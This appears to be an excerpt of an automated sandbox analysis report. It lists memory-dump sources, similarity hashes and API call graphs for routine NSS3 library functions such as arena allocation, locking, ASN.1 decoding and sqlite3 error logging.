• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$Arena$Item_$Alloc_Arena_DecodeQuickValue$AllocateCopyCriticalEnterErrorFreeInitLockPoolSectionUnlockcallocmemcpy
• String ID:
• API String ID: 1489184013-0
• Opcode ID: efdffee4618ed743c6e6ad65c1532ee754893200bee05f66cdef9e5b4961e36d
• Instruction ID: 02a647034d3a15237846ff093a676da9453b046391db2a91415908ce3a02ff0d
• Opcode Fuzzy Hash: efdffee4618ed743c6e6ad65c1532ee754893200bee05f66cdef9e5b4961e36d
• Instruction Fuzzy Hash: B11121B1E042046AF720EA25AE50FBB76B8DF4465CF40062DEC59D2B81F720A948C2F2
APIs
• PORT_NewArena_Util.NSS3(00000800,6C4FDC29,?), ref: 6C47BE64
  • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
  • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
  • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
• PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,6C4FDC29,?), ref: 6C47BE78
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
  • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
  • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
  • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
• PORT_ArenaAlloc_Util.NSS3(00000000,?,?,?,?,6C4FDC29,?), ref: 6C47BE96
  • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
• SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,?,6C4FDC29,?), ref: 6C47BEBB
  • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
  • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
• PR_SetError.NSS3(FFFFE013,00000000,?,6C4FDC29,?), ref: 6C47BEDF
• PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6C4FDC29,?), ref: 6C47BEF3
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: ArenaUtil$Alloc_$AllocateArena_Value$CopyCriticalEnterErrorFreeInitItem_LockPoolSectionUnlockcallocmemcpy
• String ID:
• API String ID: 3111646008-0
• Opcode ID: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
• Instruction ID: b0811d20015fc1c628524bf971bcb1ecee4f7e14a2e3aa950b8a0cc3e997aafb
• Opcode Fuzzy Hash: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
• Instruction Fuzzy Hash: BA11A272E012055BEB10DB659D55FAA3BA8EB41259F154028ED09EBB80EB31E909C7F1
APIs
• PORT_NewArena_Util.NSS3(00000800), ref: 6C4B985B
  • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
  • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
  • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
• PORT_ArenaAlloc_Util.NSS3(00000000,00000038), ref: 6C4B9871
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
  • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
  • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
  • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
  • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
• SEC_ASN1DecodeItem_Util.NSS3(00000000,00000000,6C59D9B0,?), ref: 6C4B98A2
  • Part of subcall function 6C4CE200: PR_SetError.NSS3(FFFFE009,00000000), ref: 6C4CE245
  • Part of subcall function 6C4CE200: PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C4CE254
• PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4B98B7
• PORT_FreeArena_Util.NSS3(00000000,00000001), ref: 6C4B9901
• PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C4B9910
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Util$Arena_$ArenaFree$ErrorValue$Alloc_AllocateCriticalDecodeEnterInitItem_LockPoolSectionUnlockcalloc
• String ID:
• API String ID: 2561846027-0
• Opcode ID: 224099c453416b2b799c048164361ce3ee35bd056afca4243be930b9ba3ddd2b
• Instruction ID: 70068e6b0163237e3f40caaa0eafbf4ddc911de95a7084ff705232e9ddfeda8c
• Opcode Fuzzy Hash: 224099c453416b2b799c048164361ce3ee35bd056afca4243be930b9ba3ddd2b
• Instruction Fuzzy Hash: 3C110272A0124477FF00DE609C81FAA3A78AB653A9F150224FD1869791E773D8A483A1
APIs
  • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
• PR_SetError.NSS3(FFFFE005,00000000), ref: 6C503D3F
  • Part of subcall function 6C47BA90: PORT_NewArena_Util.NSS3(00000800,6C503CAF,?), ref: 6C47BABF
  • Part of subcall function 6C47BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C503CAF,?), ref: 6C47BAD5
  • Part of subcall function 6C47BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C503CAF,?), ref: 6C47BB08
  • Part of subcall function 6C47BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C503CAF,?), ref: 6C47BB1A
  • Part of subcall function 6C47BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C503CAF,?), ref: 6C47BB3B
• PR_EnterMonitor.NSS3(?), ref: 6C503CCB
  • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
  • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
  • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                            • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C503CE2
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C503CF8
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C503D15
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C503D2E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4030862364-0
                                                                                                                                                                                                                          • Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                          • Instruction ID: 69067ddd7e9b3e7ec47dc2e2c8469aad466ed2034e886c524c78884ea3680f4d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D811C4B6B50600AFE7209A65EC41F9BB3E5AF51248F504538E81ADBB20F632F919C652
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C4CFE08
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C4CFE1D
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C4CFE29
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C4CFE3D
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C4CFE62
                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?), ref: 6C4CFE6F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 660648399-0
                                                                                                                                                                                                                          • Opcode ID: 94235923d40657ea39750aff7ada1259908c8024ddfdc9f063f2ced6214a4396
                                                                                                                                                                                                                          • Instruction ID: 00417055491a8b5125191b0d476d1f8975d295cfed122c0fdebd98708e970416
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94235923d40657ea39750aff7ada1259908c8024ddfdc9f063f2ced6214a4396
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 661100BA7026056BFB00DF55DC40E5B77A4AF54259F158038ED1C87B22E735E914C7D2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_Lock.NSS3 ref: 6C57FD9E
                                                                                                                                                                                                                            • Part of subcall function 6C539BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C461A48), ref: 6C539BB3
                                                                                                                                                                                                                            • Part of subcall function 6C539BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C461A48), ref: 6C539BC8
                                                                                                                                                                                                                          • PR_WaitCondVar.NSS3(000000FF), ref: 6C57FDB9
                                                                                                                                                                                                                            • Part of subcall function 6C45A900: TlsGetValue.KERNEL32(00000000,?,6C5D14E4,?,6C3F4DD9), ref: 6C45A90F
                                                                                                                                                                                                                            • Part of subcall function 6C45A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C45A94F
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C57FDD4
                                                                                                                                                                                                                          • PR_Lock.NSS3 ref: 6C57FDF2
                                                                                                                                                                                                                          • PR_NotifyAllCondVar.NSS3 ref: 6C57FE0D
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C57FE23
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3365241057-0
                                                                                                                                                                                                                          • Opcode ID: 90e8ba26b482239a8eb33c561f3e3641ec10b4fbb9054642992055932be2e371
                                                                                                                                                                                                                          • Instruction ID: ba106c773ea658ded70a9bc6d5bc109679d3dddee0c988f447901ed13e3d7a8c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90e8ba26b482239a8eb33c561f3e3641ec10b4fbb9054642992055932be2e371
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6101A1FAA142109FDF159E55FD00C527731BB4227D7150374E82A47BE1E722ED28C6DA
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_NewMonitor.NSS3(00000000,?,6C50AA9B,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C506846
                                                                                                                                                                                                                            • Part of subcall function 6C461770: calloc.MOZGLUE(00000001,0000019C,?,6C4615C2,?,?,?,?,?,00000001,00000040), ref: 6C46178D
                                                                                                                                                                                                                          • PR_NewMonitor.NSS3(00000000,?,6C50AA9B,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C506855
                                                                                                                                                                                                                            • Part of subcall function 6C4C8680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C4755D0,00000000,00000000), ref: 6C4C868B
                                                                                                                                                                                                                            • Part of subcall function 6C4C8680: PR_NewLock.NSS3(00000000,00000000), ref: 6C4C86A0
                                                                                                                                                                                                                            • Part of subcall function 6C4C8680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C4C86B2
                                                                                                                                                                                                                            • Part of subcall function 6C4C8680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C4C86C8
                                                                                                                                                                                                                            • Part of subcall function 6C4C8680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C4C86E2
                                                                                                                                                                                                                            • Part of subcall function 6C4C8680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C4C86EC
  • Part of subcall function 6C4C8680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C4C8700
• PR_NewMonitor.NSS3(?,6C50AA9B,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C50687D
  • Part of subcall function 6C461770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C4618DE
  • Part of subcall function 6C461770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C4618F1
• PR_NewMonitor.NSS3(?,6C50AA9B,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C50688C
  • Part of subcall function 6C461770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C4618FC
  • Part of subcall function 6C461770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C46198A
• PR_NewLock.NSS3 ref: 6C5068A5
  • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
• PR_NewLock.NSS3 ref: 6C5068B4
  • Part of subcall function 6C5398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C539946
  • Part of subcall function 6C5398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3F16B7,00000000), ref: 6C53994E
  • Part of subcall function 6C5398D0: free.MOZGLUE(00000000), ref: 6C53995E
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
• String ID:
• API String ID: 200661885-0
• Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
• Instruction ID: 945f75ac4882d703893fb63a1888388a182236160d0d4d7e057436d2d442f703
• Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
• Instruction Fuzzy Hash: 1701FBB0B01F0746E751AB764C20BE7B6E46F41299F10043E8869C6A40EF71D4488FA1
APIs
• sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C45AFDA
Strings
• 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C45AFC4
• unable to delete/modify collation sequence due to active statements, xrefs: 6C45AF5C
• %s at line %d of [%.10s], xrefs: 6C45AFD3
• misuse, xrefs: 6C45AFCE
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: sqlite3_log
• String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
• API String ID: 632333372-924978290
• Opcode ID: 056d1ea313f7f48650afc52a04701471a225e6d52d92d6c59e28280c3cdf435e
• Instruction ID: b33ea77313f702c5ac1db90167997aeb66b982713785292dd4adc0818f3df744
• Opcode Fuzzy Hash: 056d1ea313f7f48650afc52a04701471a225e6d52d92d6c59e28280c3cdf435e
• Instruction Fuzzy Hash: 0A91DE71B012158FDB04CF69C850FBEBBF1AF49315F5985A8E865AB791C331AC12CBA0
APIs
• PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C4BFC55
• strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4BFCB2
• PR_SetError.NSS3(FFFFE040,00000000), ref: 6C4BFDB7
• PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C4BFDDE
  • Part of subcall function 6C4C8800: TlsGetValue.KERNEL32(?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8821
  • Part of subcall function 6C4C8800: TlsGetValue.KERNEL32(?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C883D
  • Part of subcall function 6C4C8800: EnterCriticalSection.KERNEL32(?,?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8856
  • Part of subcall function 6C4C8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C4C8887
  • Part of subcall function 6C4C8800: PR_Unlock.NSS3(?,?,?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8899
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
• String ID: pkcs11:
• API String ID: 362709927-2446828420
• Opcode ID: 57764a7d94d6ff5f2a8f4380b88dc87155d8b5c1a939a19a7c579468ee2cae0c
• Instruction ID: 04912c9921f86caf619f5ef1bd80765c3a8b0a4b2fc8465d5f5b3cd43085b1af
• Opcode Fuzzy Hash: 57764a7d94d6ff5f2a8f4380b88dc87155d8b5c1a939a19a7c579468ee2cae0c
• Instruction Fuzzy Hash: 805192BDB062119BFB00CE649C80F9A3779AB4135AF150029DD0E7BB51EB31F9059BB2
APIs
• memcmp.VCRUNTIME140(00000000,?,?), ref: 6C3FBE02
  • Part of subcall function 6C529C40: memcmp.VCRUNTIME140(?,00000000,6C3FC52B), ref: 6C529D53
• sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3FBE9F
Strings
• database corruption, xrefs: 6C3FBE93
• 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3FBE89
• %s at line %d of [%.10s], xrefs: 6C3FBE98
Memory Dump Source
• Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
Similarity
• API ID: memcmp$sqlite3_log
• String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
• API String ID: 1135338897-598938438
• Opcode ID: 64737cf1a7c81411f29bcded457492fa96cab55db6600cad63484a4943255aff
• Instruction ID: 1818aa04d2354000f43be0c5aa805b65b7193723cb6893c1758cce3f78bc5516
• Opcode Fuzzy Hash: 64737cf1a7c81411f29bcded457492fa96cab55db6600cad63484a4943255aff
